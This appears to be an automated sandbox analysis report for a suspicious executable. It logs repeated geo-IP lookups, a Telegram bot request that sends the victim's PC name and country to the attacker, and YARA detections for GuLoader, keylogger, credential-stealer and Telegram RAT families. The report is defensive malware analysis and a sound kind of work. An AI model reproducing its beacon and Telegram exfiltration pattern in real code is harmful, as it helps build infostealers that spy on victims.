Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:09:59 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-25 06:09:59 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Mon, 25 Nov 2024 06:09:59 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 478908
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bfr3OZKQmXlcDP5OXrGiltNUYk23T3y3maN9Ye0XD16%2BMAO%2FNA1ulm3NAyvBlCF2%2FScKNOGT%2FYqO5eOliJJIVptGpEl7JzGIg5tbF9h1dxXzZaoxw3jPi7o8iGM7qN%2B2NKAtNzfJ"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e7f7919eadfef9f-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1449131&cwnd=191&unsent_bytes=0&cid=49a2bf9f4ae7c2ec&ts=475&x=0"
2024-11-25 06:09:59 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 2 | Source IP: 192.168.2.6 | Source Port: 49838 | Destination IP: 172.67.177.134 | Destination Port: 443 | PID: 4488 | Process: C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:05 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-25 06:10:06 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Mon, 25 Nov 2024 06:10:06 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 478915
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9hGK4aScMIpRmbHmHLoRgx5O3cZ0mPjGXBfm%2B%2BZCXzrN9rvaBqQSOs%2FrwEBSSghtexj6thGWMQii4BbsMNG4R0cclMr1754bcjU5v4bHiNRfrHMOLWcEWb5ChkMBqAFeE5ZYIubC"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e7f79450cf88c42-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1987&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1454183&cwnd=252&unsent_bytes=0&cid=8d48d88e11c78908&ts=450&x=0"
2024-11-25 06:10:06 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 3 | Source IP: 192.168.2.6 | Source Port: 49852 | Destination IP: 172.67.177.134 | Destination Port: 443 | PID: 4488 | Process: C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:10 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-11-25 06:10:11 UTC | 855 | IN | HTTP/1.1 200 OK
    Date: Mon, 25 Nov 2024 06:10:10 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 478919
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eU81lUF7kdVX1o3HF9%2BwTz3X53SZBa4K2TMakAwsUDWJ%2BhmWMQVrnvDtzcsBqrZ%2FytPiDqPazeYlkkBIOnWYYkOmoHtAS6yHy58DQR3xJbB5tETXwBY%2BNZq0%2FFTL1YiqfoABp8e5"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e7f796239db430e-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1920&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1798029&cwnd=178&unsent_bytes=0&cid=2867854f75c9e077&ts=471&x=0"
2024-11-25 06:10:11 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 4 | Source IP: 192.168.2.6 | Source Port: 49862 | Destination IP: 172.67.177.134 | Destination Port: 443 | PID: 4488 | Process: C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:13 UTC | 84 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2024-11-25 06:10:14 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Mon, 25 Nov 2024 06:10:14 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 478923
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcoRa0BasHxiky4tBuHEVk3UVnMp4DKbclpVH3RnMwaU1%2FBW6u0bajjUkZ5Ek1deaX7CUy%2FVpRYpBNtptlr2UKpOSWMW1my2ak27YqGpGz%2BaLkLSOT6sjeGIknNOWjSZCf8QQ9OP"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e7f79765fea0cb8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1661&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1765417&cwnd=162&unsent_bytes=0&cid=e835a674fdd209f2&ts=450&x=0"
2024-11-25 06:10:14 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID: 5 | Source IP: 192.168.2.6 | Source Port: 49871 | Destination IP: 172.67.177.134 | Destination Port: 443 | PID: 4488 | Process: C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:17 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
    Host: reallyfreegeoip.org
2024-11-25 06:10:18 UTC | 851 | IN | HTTP/1.1 200 OK
    Date: Mon, 25 Nov 2024 06:10:17 GMT
    Content-Type: text/xml
    Content-Length: 361
    Connection: close
    Cache-Control: max-age=31536000
    CF-Cache-Status: HIT
    Age: 478926
    Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
    Accept-Ranges: bytes
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pqryd35Sy3u0gfyl0NvgrjgLCZ5gUn9QN0cxPx581r4z%2BGLSRAcCZR0cmUa74JUvLTW7My%2FSC2XqDy0kNtHzmBPcqFBaeKunsxanj9VcT5vfD3Bqwrai2UM%2BJZ8MFGa6GFvhs5YN"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8e7f798e0bb7429b-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1712609&cwnd=251&unsent_bytes=0&cid=c087a095f61beb69&ts=455&x=0"
2024-11-25 06:10:18 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
    Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                  6192.168.2.649882172.67.177.1344434488C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                  2024-11-25 06:10:20 UTC60OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                  2024-11-25 06:10:21 UTC845INHTTP/1.1 200 OK
                                                                                                                                                  Date: Mon, 25 Nov 2024 06:10:21 GMT
                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                  Content-Length: 361
                                                                                                                                                  Connection: close
                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                  Age: 478930
                                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=V9xrbQOYZj6fAmfFiW7l02dk5arnAdGjyH2osUp9B1N8bnHA492uq0d72q5zhx4OQNzZRYYS4zZC0WCdP2Oprke3qN7BhQXvWDkOFbG53vtM1ERQGVciG45yNp8KquM8nEOTIadV"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 8e7f79a2f82e8cd6-EWR
                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1972&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1360037&cwnd=165&unsent_bytes=0&cid=5ab10eb46a64bbe5&ts=472&x=0"
2024-11-25 06:10:21 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49890 | 172.67.177.134 | 443 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:24 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-25 06:10:24 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:24 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 478933
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AHlPrWgRLyG%2B10mPLICEKnjCr%2F78Mu9r27apIFZeiLe0G7im3XB4XRETPSuJNhKz1l4HRaxAt8FafCq%2BO1zS%2BnVvKKq5wUCy%2BdcQA0mY5vXNU9abGBr6v1QUvJW61lSVgmpNOvzm"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e7f79b77b3a0cb2-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1581&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1760096&cwnd=146&unsent_bytes=0&cid=6aefe757e1a600ad&ts=458&x=0"
2024-11-25 06:10:24 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49902 | 172.67.177.134 | 443 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:27 UTC | 60 | OUT | GET /xml/8.46.123.75 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-25 06:10:28 UTC | 855 | IN | HTTP/1.1 200 OK
Date: Mon, 25 Nov 2024 06:10:28 GMT
Content-Type: text/xml
Content-Length: 361
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 478937
Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UlQ1hsLsWqo0OPhQKS%2FZ2TPaSG1XiK%2F%2BH8Q%2FrztXHsvaEe4gigINaQTbNsY7LDh1IyCLQoSGvveaj1jOTPoUg1N7m%2BC4V1Tgwky20HB0pgfWclOiMeUnjVREtnHnQQVPBzwE6lKy"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e7f79ce8b364228-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1709&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1634023&cwnd=194&unsent_bytes=0&cid=c99305673940036f&ts=466&x=0"
2024-11-25 06:10:28 UTC | 361 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.6 | 49907 | 149.154.167.220 | 443 | 4488 | C:\Users\user\Desktop\MC8017774DOCS.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-25 06:10:30 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:506013%0D%0ADate%20and%20Time:%2026/11/2024%20/%2015:27:34%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20506013%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-11-25 06:10:30 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 25 Nov 2024 06:10:30 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-25 06:10:30 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



                                                                                                                                                  Target ID:0
                                                                                                                                                  Start time:01:09:07
                                                                                                                                                  Start date:25/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\MC8017774DOCS.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:567'152 bytes
                                                                                                                                                  MD5 hash:D4C19E96D83BD586016A3BE2E3A57F1D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.2522145206.0000000000848000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2522664351.00000000037E7000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  Reputation:low
                                                                                                                                                  Has exited:true

                                                                                                                                                  Target ID:4
                                                                                                                                                  Start time:01:09:39
                                                                                                                                                  Start date:25/11/2024
                                                                                                                                                  Path:C:\Users\user\Desktop\MC8017774DOCS.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:"C:\Users\user\Desktop\MC8017774DOCS.exe"
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:567'152 bytes
                                                                                                                                                  MD5 hash:D4C19E96D83BD586016A3BE2E3A57F1D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000003.2640209987.0000000003DD3000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000004.00000002.3480962363.0000000036720000.00000004.08000000.00040000.00000000.sdmp, Author: unknown
